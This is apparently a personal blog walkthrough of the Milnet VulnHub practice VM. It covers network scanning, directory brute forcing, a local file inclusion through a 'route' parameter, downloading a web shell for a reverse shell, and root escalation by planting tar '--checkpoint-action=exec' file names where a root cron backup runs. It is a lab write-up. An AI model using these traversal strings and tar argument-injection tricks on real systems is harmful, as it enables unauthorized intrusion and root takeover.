Hi everyone, finally I decided to write some of articls that releated to IT security, so I started with Milnet VM. First, starting with scanning the network to identify the VM's ip address
scanning the network
Since it's a local network, the fastest way to scan the network is using the arp technique. Therefore, as shown it's the only machine on this network :D. Next, nmap's time to check what services this machine provides.
Brute Force Result!
It looks that we are going to need some of the web application skills :D. The web site is really simple and no much information has.
brute force directories is my favorate. Many tools could do this task, such as wfuzz, dirb, and dirbuster, for this one, I have used dirb on Kali linux, and I have the following:
during the examination, I have noticed that the index page sends a post request to content.php with route parameter route=main! Since I know there is a info.php file on the same directory, I have tried to put route=info!!! Surprisingly, I have the same page as the info.php. Therefore, here we have include function with .php at the end!
To confirm that is a LFI vulnerabilty. I have tried the following since I know the full path of the web server
route=../../../var/www/html/info
And bingo! we have LFI without any filter, but we still require to get off the .php!!! For this one, I have spend some time trying some of bypass LFI techinques, and the only one that works with me is:
Using LFI, I was able to perform remote command injection using the base64 form of the following php code:
Reverse Shell
Therefore, I was able to wget my shell. The following picture shows that I have successfully downloaded the cmd.php file:
And here accessing the cmd.php
I have successfully received a reverse shell on port 5555 using b374k shell features.
Tar command execution!
During the anlysis of the server, I have noticed that /etc/crontab is readable! It looks that backup.sh does a backup of the web directory every one minute:
Checking /backup/backup.sh file, and It has a root privillege!!! this is good. Checking the content!
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *
During the examination of server, I have found many txt files at /home/langman/SDINET and one of them gets my attention which is DefenseCode_Unix_WildCards_Gone_Wild.txt. It has a section about how to get a command execution using tar command!!!! Bingooo :))
Since backup.sh has root privilleges, we can take advantage of getting remote execution.
We require to create 3 files on the same directory that tar creates a backup from, which is in this case is /var/www/html/as the following:
1. "--checkpoint=1"
2. "--checkpoint-action=exec=sh shell.sh"
3. shell.sh - that has commands!
Getting root Privilleges!
Everything is set, now we need to put commands that help us to execute with root privilleges!, but first I want to check if everything is correct, so I have inserted the following id > /tmp/id.txt into shell.sh!, and after one minute!!!!!!
Finally, I have added a www-data user to /etc/sudoersto get access to the root user! I am sure others will have different way to do this!
into shell.sh file. And after one minute!!
Finally, I would like to thank @teh_warriar and #vulnhub for the VM. It was fun.